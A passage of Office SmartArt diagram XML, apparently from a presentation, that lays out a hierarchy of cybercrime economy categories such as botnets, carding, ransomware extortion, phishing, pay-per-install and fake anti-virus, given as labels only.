    <dgm:cxn modelId="{E4E50648-66B0-4B93-9C04-4D70D4C390D4}" type="presParOf" srcId="{85CE7EBA-A70E-4C09-B045-A49F4EE7818F}" destId="{44FEA90B-B9F0-4838-A33A-C2D7921EB239}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{C6E79500-C5CB-4E73-BA17-B6D9BCE88DE2}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{493BF7B8-A5EF-4E70-BC84-2CB6E0FDEE0A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{DD6FF320-BA5D-4D63-BE54-468A9BE1ABC8}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{30E2F406-52B6-4843-8762-19EE82C6795D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{7D5B285A-DD70-4CB2-83CA-363AC56158E5}" type="presParOf" srcId="{30E2F406-52B6-4843-8762-19EE82C6795D}" destId="{B81EEFDE-3C40-428C-BE91-8430BFBCEA16}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{846994CE-CB32-4B54-9243-F462A1BAB8D6}" type="presParOf" srcId="{B81EEFDE-3C40-428C-BE91-8430BFBCEA16}" destId="{41F46E1C-1ABF-4C23-8BC5-73CEEFAF6B00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{11BDAE4A-BDED-4A8E-B175-FF65C957881B}" type="presParOf" srcId="{B81EEFDE-3C40-428C-BE91-8430BFBCEA16}" destId="{89825871-887C-4144-92E4-0CD1C779523E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{BE544174-B4AF-4ACC-B8C4-4A81C82B51D3}" type="presParOf" srcId="{30E2F406-52B6-4843-8762-19EE82C6795D}" destId="{A382E3D8-F167-402C-95ED-E85E712B3958}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AB97D865-4F7E-43FB-A2BD-0B3C980F8B8D}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{AC97DC07-675E-4CF3-9913-C7CB3E6FE0DB}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{A1E0EB1C-BCB0-40B7-85BC-0ACFABA3374D}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{079BF440-650D-4823-B2D6-4DF79A303EB7}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9F17A1D6-89D0-479D-9E04-BB7ABFD5CE57}" type="presParOf" srcId="{079BF440-650D-4823-B2D6-4DF79A303EB7}" destId="{26B98B58-CCA1-49D4-A030-D5CDC237226A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{67966BE4-FE5C-4570-9440-292AFFDB4ECC}" type="presParOf" srcId="{26B98B58-CCA1-49D4-A030-D5CDC237226A}" destId="{4F3658AF-6F52-4172-B81C-592F00EDFFF5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{5B4386DD-F917-43FB-BD7A-792114CE85BD}" type="presParOf" srcId="{26B98B58-CCA1-49D4-A030-D5CDC237226A}" destId="{769CFD7A-F5DE-46F5-9CC2-F86EEF9DC6D8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D68CB307-387B-4B02-BB59-4F8D93E9BECE}" type="presParOf" srcId="{079BF440-650D-4823-B2D6-4DF79A303EB7}" destId="{F80F370F-4960-4A7F-8CDD-3F645777D926}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{C7262EEE-09B2-4C39-B93D-0C6697BFCA6B}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{1164DF9C-47B4-4930-BF8C-FB83C56F57E8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9ABDAE99-4AA9-4F09-8D3E-8A19AF57C419}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{BB6C78B2-14D7-4BAD-A77C-2CC056C23A03}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{A778D506-92B5-4FC9-8988-820EDFBF4190}" type="presParOf" srcId="{BB6C78B2-14D7-4BAD-A77C-2CC056C23A03}" destId="{D3F9391C-904D-4C42-9756-3F7D6BB5BF48}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{67965192-6709-4753-B296-83A5E275D540}" type="presParOf" srcId="{D3F9391C-904D-4C42-9756-3F7D6BB5BF48}" destId="{96FDB7BD-35DB-46BD-8744-5C5B8B4000BF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{49871D27-F564-45D4-9535-E5D3429C61C3}" type="presParOf" srcId="{D3F9391C-904D-4C42-9756-3F7D6BB5BF48}" destId="{1DE75C67-9F60-4DCF-8A09-6EBB5AA047F8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{72988983-F36C-49B8-9178-884F57BA9842}" type="presParOf" srcId="{BB6C78B2-14D7-4BAD-A77C-2CC056C23A03}" destId="{3E089C12-00A1-4C52-ACA6-DA689DC530B1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D3D7B3E0-2DE8-4C73-8092-27B984FFF627}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{DCB922D2-A971-46B6-8A66-A63871EC5D71}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{913BBCA6-6A15-4081-ACFB-D98F477B7550}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{1BE63070-B619-415B-AE72-C4895210C2ED}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{88885C49-E13F-46DB-BD55-02549CE6B683}" type="presParOf" srcId="{1BE63070-B619-415B-AE72-C4895210C2ED}" destId="{2CDC735E-3F1A-4A75-90D7-4773653B5E0B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{39DE0E1E-A457-4031-A6D1-C04DDA15C6D9}" type="presParOf" srcId="{2CDC735E-3F1A-4A75-90D7-4773653B5E0B}" destId="{0F54FE08-C494-4F47-82B7-FE51BDB88D1B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{26F2BD33-885F-4A44-82C7-4A65EBFA30E6}" type="presParOf" srcId="{2CDC735E-3F1A-4A75-90D7-4773653B5E0B}" destId="{D7493045-F4D0-49BB-8749-0235A8D3915E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{F54E657B-FEC8-4658-B618-9477ABD53598}" type="presParOf" srcId="{1BE63070-B619-415B-AE72-C4895210C2ED}" destId="{E562E629-8E7C-4C02-A214-F4E36EE87E99}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AE993755-C27B-4D66-B7FA-337056FF690B}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{B2CAA67D-ED33-4120-9634-DF98516FB005}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{4BC450DA-C7E2-4383-A9BD-D326CF26687E}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{0DF4443E-EF58-4CDA-AE3C-5FC35EE675D5}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B0B4EB34-DD2F-4309-B751-E58D5D591CAF}" type="presParOf" srcId="{0DF4443E-EF58-4CDA-AE3C-5FC35EE675D5}" destId="{EE9C7157-398A-46DB-BD6B-659BF0106723}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9532000B-227B-4799-A1D1-6E51BB4EC17B}" type="presParOf" srcId="{EE9C7157-398A-46DB-BD6B-659BF0106723}" destId="{A20E9766-61CD-4711-B99D-41622BFCA782}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D0537B6E-16F4-4A9A-A7DF-AE2F524FE785}" type="presParOf" srcId="{EE9C7157-398A-46DB-BD6B-659BF0106723}" destId="{E1CF22F3-AC19-46C9-A82F-89D8DB189CE8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E619EEAD-D932-4228-A171-FDFC2A3FA229}" type="presParOf" srcId="{0DF4443E-EF58-4CDA-AE3C-5FC35EE675D5}" destId="{4A7C2F52-ACA9-4730-89EA-B234D19B30FD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AC723CA2-7799-4818-B6E1-D9570D14FB31}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{CE2BD6A2-C6A6-4AE7-8716-F62AC787B4F6}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{137C7443-E818-4254-BC58-ED1832584EF8}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{124F88C5-C1D5-4402-8050-69A3610B0063}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{0B5E36FB-CF72-4F52-8173-8D0CCEDA9AF4}" type="presParOf" srcId="{124F88C5-C1D5-4402-8050-69A3610B0063}" destId="{AA562350-23EB-4A00-9F4B-5CA6A4AF8D46}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{DC7E7830-0E48-4050-9CC0-FF34AA022703}" type="presParOf" srcId="{AA562350-23EB-4A00-9F4B-5CA6A4AF8D46}" destId="{5B804CA3-5F0C-4C9A-9948-6267A36AC286}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{2CA4696A-F32D-4557-9668-86E3DEF687D3}" type="presParOf" srcId="{AA562350-23EB-4A00-9F4B-5CA6A4AF8D46}" destId="{F83FE0F9-C0AD-41ED-8499-585D4FDF8177}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E8990450-3DB7-4904-A625-F1E80A3C4A27}" type="presParOf" srcId="{124F88C5-C1D5-4402-8050-69A3610B0063}" destId="{E3521F4E-CD84-466B-AF37-02AB70C55B9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20B35F-2635-4F8F-9051-2B1A318D39FF}"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B632587F-1A59-4B58-8F39-3F88332608F5}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Botnets</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E780597-A9D7-4E6A-B969-7F37A974753C}" type="parTrans" cxnId="{E50FB978-B72E-4ADD-B08D-9D1C5B9112CA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BAFC8618-BD8D-4D8C-BB34-17C52689EDA4}" type="sibTrans" cxnId="{E50FB978-B72E-4ADD-B08D-9D1C5B9112CA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6F06AC04-9C84-4A47-BFDD-AE87232D1106}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Credit Card and Bank Account Theft</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E7D7A7B-2ADD-469E-B0F8-D565F03F46F9}" type="parTrans" cxnId="{6955F1D0-FCF9-4D8D-BAD2-2E27D171F963}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33C404C4-6211-4C8B-9140-D0533EAFE621}" type="sibTrans" cxnId="{6955F1D0-FCF9-4D8D-BAD2-2E27D171F963}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F920927-1A73-470C-97F0-75ABFA67423F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Carders, Cashiers, and Money Mules</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B2D1F3B-F359-4548-91E0-0C2AC7CCD7A1}" type="parTrans" cxnId="{82B5D393-E6BA-4C99-82EC-CE197264E0FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79406963-93E8-4610-9E27-FEFF794E3AB0}" type="sibTrans" cxnId="{82B5D393-E6BA-4C99-82EC-CE197264E0FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{426355DA-85B0-49DB-B723-939237685E7C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>DDoS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> and Ransomware Extortion</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05039FCC-4F08-4EEE-ACAE-BAC85EFDD1D7}" type="parTrans" cxnId="{EEE27B68-13C0-4E69-9E3D-E81F26365082}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7DCF50B-90BE-4C41-AAFB-5990C2737070}" type="sibTrans" cxnId="{EEE27B68-13C0-4E69-9E3D-E81F26365082}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{03A48CFA-6496-41BF-A746-80A181C3C3DE}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Spam</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72633D96-4A27-4E50-A39C-37AB41EEA9FE}" type="parTrans" cxnId="{C81AFF4B-9D0E-40B1-8E5B-30F389DDAD49}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E5E1350-FE66-4F91-840A-B3A1E5069B7E}" type="sibTrans" cxnId="{C81AFF4B-9D0E-40B1-8E5B-30F389DDAD49}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{45F34A96-294F-4F91-858C-0CCFEC2CFF6B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Bitcoin Mining</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3BBBB2C-8F74-4541-A78F-D9AB9652D44B}" type="parTrans" cxnId="{BC699438-0C3B-47B3-AEEF-4B3B9C697BED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AD622BB-3D20-4961-90A9-7E3A3EAB1155}" type="sibTrans" cxnId="{BC699438-0C3B-47B3-AEEF-4B3B9C697BED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C92294B8-F12A-42FD-B72C-42C2FDCD2D8E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Phishing</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{80A49C2A-5C20-42BB-A1DC-6558C20289C2}" type="parTrans" cxnId="{300F84A7-6FDC-427E-9649-2E614B2A1266}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{611D77A5-92DE-47E3-878A-892C64739260}" type="sibTrans" cxnId="{300F84A7-6FDC-427E-9649-2E614B2A1266}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CB81644-432E-42AF-ABA9-71ABDDE58956}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Counterfeit Goods</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95C1DC5D-E737-4A41-83F0-AD800A95D9F5}" type="parTrans" cxnId="{FCFD1F00-69B0-4BBB-AC3F-C6E2A9364DB0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87368739-70E0-48CC-B078-DBA02B966C38}" type="sibTrans" cxnId="{FCFD1F00-69B0-4BBB-AC3F-C6E2A9364DB0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{934DA221-5443-497E-A4E4-A348E6ACDDB7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Malware Attachments</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37AAF2A0-4D79-4496-8E06-D2AF95C6A459}" type="parTrans" cxnId="{E7DA6F74-E0A4-4C91-906F-78261B5CC048}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A4D10C71-FE60-4F42-8EF6-606461EE738A}" type="sibTrans" cxnId="{E7DA6F74-E0A4-4C91-906F-78261B5CC048}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7262895B-02E6-4067-B862-A12DB86A98B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Pharma</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B84157D2-97EE-4800-B4AC-94C8F5F6CAC1}" type="parTrans" cxnId="{48E9A6F3-62C7-4B34-8F68-E30BE366DA6C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{28D31E2B-7F29-4B0D-9CDC-20DFC358C7ED}" type="sibTrans" cxnId="{48E9A6F3-62C7-4B34-8F68-E30BE366DA6C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A040FE0B-3A44-46B9-9424-B56BC4D65E95}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>Blackhat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> SEO</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D121FA2-20E5-4E0E-88EC-D5A9C0452847}" type="parTrans" cxnId="{AB9BDB96-A156-473B-BFA6-EECEEE12996E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0ECBD85E-E0D0-495A-A4FD-CAF42D3ADB40}" type="sibTrans" cxnId="{AB9BDB96-A156-473B-BFA6-EECEEE12996E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2D5D588F-80DC-4FDD-98BE-6E3704DB411B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Pay-per-Install and Exploit-as-a-Service</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A42A7329-4DA3-4869-8617-3824288EF391}" type="parTrans" cxnId="{14380A70-6C0D-4A7D-B752-D44E7EB01E39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CDE658F-6147-4FED-A73B-62A6AC1A7E5F}" type="sibTrans" cxnId="{14380A70-6C0D-4A7D-B752-D44E7EB01E39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EC9FE7DE-111B-427E-B20F-BE55EAAA5C05}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Stolen Account Credentials</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4F9A58A-71BA-480D-A44D-85E6052D9457}" type="parTrans" cxnId="{4FAA5713-4C82-4B01-A806-3805C6348315}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2E4EC8B8-ADA8-4018-ACC7-85917FA79FD3}" type="sibTrans" cxnId="{4FAA5713-4C82-4B01-A806-3805C6348315}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5048C93B-541A-4FDD-AC3E-2671C3EB6C9E}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Click Fraud and Ad Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C9F1BEEB-C5D9-4347-9606-A26E3DC42AA2}" type="parTrans" cxnId="{9F116194-E782-4DFC-B1D4-64DB22002ACC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D8F5181-9AE1-45D5-A651-15502F126A3A}" type="sibTrans" cxnId="{9F116194-E782-4DFC-B1D4-64DB22002ACC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{758232FE-730C-49AE-A3A1-86B6C0DD3E92}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Fake Anti-virus</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33603E56-D327-4393-B45F-8318C1455A1A}" type="parTrans" cxnId="{9E7EDD52-831F-410B-8A4F-430B1D40EB25}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
